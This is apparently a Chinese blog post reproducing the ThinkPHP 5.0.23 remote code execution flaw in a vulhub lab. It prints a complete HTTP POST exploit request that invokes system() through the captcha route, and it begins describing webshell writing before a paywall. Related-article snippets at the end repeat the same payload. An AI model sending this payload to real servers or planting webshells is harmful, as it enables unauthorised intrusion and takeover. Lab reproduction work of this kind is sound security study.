thinkphp 5.0.23 rce漏洞复现

最新推荐文章于 2025-09-08 22:34:35 发布
原创 最新推荐文章于 2025-09-08 22:34:35 发布 · 883 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #安全漏洞

本文介绍了thinkphp 5.0.23版本的远程代码执行(RCE)漏洞复现过程。首先,文章简述了thinkphp作为一个流行的PHP开发框架的特点。接着,通过在vulhub上搭建环境来模拟漏洞场景。作者抓包并发送特定流量包,展示了如何利用该漏洞执行远程代码。最后,文中提到了在利用过程中遇到的$符号过滤问题,以及如何通过转义字符成功写入一句话木马,并利用蚁剑连接获取shell。

thinkphp 5.0.23 rce漏洞复现

thinkphp介绍

thinkphp是一个快速、兼容而且简单的轻量级国产php开发框架,支持windows/Unix/linux等服务器环境,并且有相当多的CMS是在thinkphp基础上二次开发的。

环境搭建

使用vulhub搭建环境,过程不赘述。

漏洞复现

抓包并直接发送下面的流量包,即可利用漏洞进行远程代码执行

POST /index.php?s=captcha HTTP/1.1
Host: IP:PORT
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 79

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd

发包可见,命令执行成功
在这里插入图片描述

获取shell

利用命令执行写入一句话木马,注意一个坑,$符号会被过滤掉,原因不明,因此需要$进

最低0.47元/天 解锁文章
thinkphp5.0.23rce复现
Cwillchris的博客
03-13 854
5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞。从图中可以看出,docker0网卡发生了错误,并且没有常见的IPV4,这里基本可以确定是docker的网络出现了问题 , 可以通过重置docker网络解决。可以发现docker的网卡正常了,并且通过物理机访问docker容器中的应用也已经正常。这样就掌握了漏洞利用的完整过程。启动环境,启动环境会先拉取镜像,网络不好可能会拉取不下来的。
ThinkPHP5 5.0.23-rce远程代码执行漏洞复现
kknifek的博客
09-08 496
其版本5中,由于框架对控制器名没有进行足够的检测,会导致在没有开启强制路由的情况下可执行任意方法,从而导致远程命令执行漏洞。通过echo命令写入 Webshell 文件,首先将一句话木马进行Base64 编码。判断是否存在漏洞:访问/index.php?s=captcha页面,会出现如下报错。使用HackBar 插件发送 POST 请求。端口为:8080,访问网站,搭建成功。访问shell.php,使用蚁剑连接。ThinkPHP是一款运用极广的。
Thinkphp5.0.23-rce漏洞复现
qq_64875725的博客
06-02 2831
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。: 'GET';} elseif (!} else {
0起步学习网络安全(学习篇):DAY10 Web常见漏洞RCE漏洞
最新发布
Jiangbe-Boating
09-08 2220
本文介绍了Web安全中的远程命令执行漏洞(RCE)。文章首先区分了RCE的两种类型:远程命令执行和远程代码执行,并通过DVWA靶场演示了不同安全等级下的漏洞利用方式。在防御部分,提出了输入过滤、权限控制、漏洞修复等防护措施。最后强调RCE和XXE等漏洞的严重性,并建议通过靶场实践掌握防御技巧。文章采用轻松的技术语言,适合网络安全初学者理解RCE漏洞原理及防御方法。
thinkphp5.0.23漏洞复现以及脚本编写
weixin_45653478的博客
04-26 1297
ThinkPHP5.0.23漏洞主要涉及远程代码执行(RCE)的安全隐患。这一漏洞的存在是因为ThinkPHP框架在底层对控制器名的过滤不够严格,导致攻击者有可能通过特定的URL构造,调用到框架内部的敏感函数,进而执行任意命令。
Thinkphp5.0.23 rce(远程代码执行)的漏洞复现
热门推荐
陈瘦瘦的迪迦的博客
12-08 2万+
Thinkphp5.0.23 rce(远程代码执行)的漏洞复现 漏洞形成原因 框架介绍: ThinkPHP是一款运用极广的PHP开发框架。 漏洞引入: 其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞漏洞如何利用 1、访问靶机地址+端口号 进入首页 2、Burp抓包修改传参方式为Post,传入参数为"_method=__construct&filter[]=system&meth
thinkphp 5.0.23 rce 漏洞复现
m0_65764670的博客
05-29 779
这里的rce是远程命令,此漏洞利用过程为访问/index.php?进入靶场文件使用docker-compose up -d拉取镜像。使用info 0​查看适用版本。设置靶机和攻击机IP。
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析 ThinkPHP 是一个流行的 PHP 框架,它提供了许多实用的功能来帮助开发者快速构建 Web 应用程序。然而,在 ThinkPHP 5.0.05.0.23 版本中存在一个 Remote Code Execution(RCE...
thinkphp5.0.23rce漏洞复现
09-22
ThinkPHP 5.0.23版本之前存在一个远程代码执行(RCE)的漏洞漏洞的形成原因是在获取method的方法中未正确处理方法名,导致攻击者可以调用Request类的任意方法并构造利用链,从而导致远程代码执行漏洞。具体的漏洞...
Thinkphp5.0.0~5.0.23 RCE漏洞复现分析
cosmoslin的博客
11-19 6493
漏洞概要 漏洞存在于 ThinkPHP 底层没有对控制器名进行很好的合法性校验,导致在未开启强制路由的情况下,用户可以调用任意类的任意方法,最终导致 远程代码执行漏洞 的产生。 环境搭建: Phpstudy: OS: Windows PHP: 7.3.4 ThinkPHP: 5.0.22 POC http://xxxxxx.xxx/public/?s=captcha Body _method=__construct&filter[]=system&method=get&get.
漏洞复现Thinkphp5.0.23-rce
2401_86120759的博客
10-21 795
实现框架的核心类Requests的method方法实现表单请求类伪装,默认为$_POST[‘_method’]变量,却没有对_method属性进行严格校验,可以通过变量覆盖Requests类的属性,在结合框架特性实现对任意函数的调用实现任意代码执行。查看后台输入语句:_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd。网站后拼接index.php/?s=captcha进行访问。建议进行ThinkPHP版本更新。
ThinkPHP v5.0.23 核心版
10-05
ThinkPHP是一个开源的,快速、简单的面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,是为了敏捷WEB应用 开发和简化企业级应用开发而诞生的。拥有众多的优秀功能和特性,
thinkphp v5.0.23 rce
qq_43647462的博客
08-23 3837
thinkphp v5.0.23 rce 复现 Buchiyexiao. thinkphp是一个轻量级的框架,其中在thinkphp5版本中出现了很多命令执行漏洞,本文分析采用的代码使用的是thinkphp版本v5.0.23(目的是匹配docker搭建的thinkphp环境的版本) 漏洞位置 thinkphp5的主要漏洞位置位于处理请求的Request类中,其中存在method方法,简单阅读发现该方法目的是为了获取当前的请求类型,因为我没有传入任何请求,所以get,post等的数组为空 其中var
Thinkphp 5.0.23 rce复现(新手)
nqzh001的博客
12-18 1529
今天学习使用docker复现Thinkphp 5.0.23 rce漏洞 使用docker配合Vulhub一键搭建漏洞测试靶场; Vulhub搭建地址 https://vulhub.org/#/docs/run/ 这边推荐使用Ubuntu,之前使用CentOS搭建总是出现各种错误。 搭建成功后,开始访问 直接上poc _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id 这个id就是想要
ThinkPHP5 5.0.23 远程代码执行漏洞复现
weixin_54786196的博客
09-01 612
是由于框架对控制器名没有进行敏感字符检测,导致在没有开启强制路由的情况下可能导致远程代码执行。至此 ThinkPHP5 5.0.23 远程代码执行漏洞 复现成功。id是我们执行的命令,可更换我们需要的命令。5.0.235.1.31之前的所有版本。改变传参方式 GET改为POST。访问靶机ip+端口号8080。使用burp抓到首页的包。
ThinkPHP--5.0.23-rce远程代码执行
m0_74402888的博客
05-03 1041
实现框架的核心类Requests的method方法实现表单请求类伪装,默认为$_POST[‘_method’]变量,却没有对_method属性进行严格校验,可以通过变量覆盖Requests类的属性,在结合框架特性实现对任意函数的调用实现任意代码执行。攻击者可向缓存文件内写入PHP代码,导致远程代码执行。
Thiinkphp 5.0.23-rce 漏洞复现(vulhub)
MDSEC的博客
08-22 449
形成原因是因为其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。这样thinkphp 5.0.23-rce漏洞复现完成了。2>.bp抓包修改post请求,传递参数。响应包状态码为500,但是可以访问页面。访问8080端口的本机地址。尝试写入phpinfo。
Python武器库开发-武器库篇之ThinkPHP 5.0.23-RCE 漏洞复现(六十四)
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-23 2040
这里我们使用Kali虚拟机安装docker并搭建vulhub靶场来进行ThinkPHP漏洞环境的安装,我们进入 ThinkPHP漏洞环境,可以 cd ThinkPHP,然后通过 ls 查看可以搭建的靶场,目前 vulhub关于 ThinkPHP漏洞。可以搭建的靶场有五个。然后我们在浏览器输入就可以访问靶场环境。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值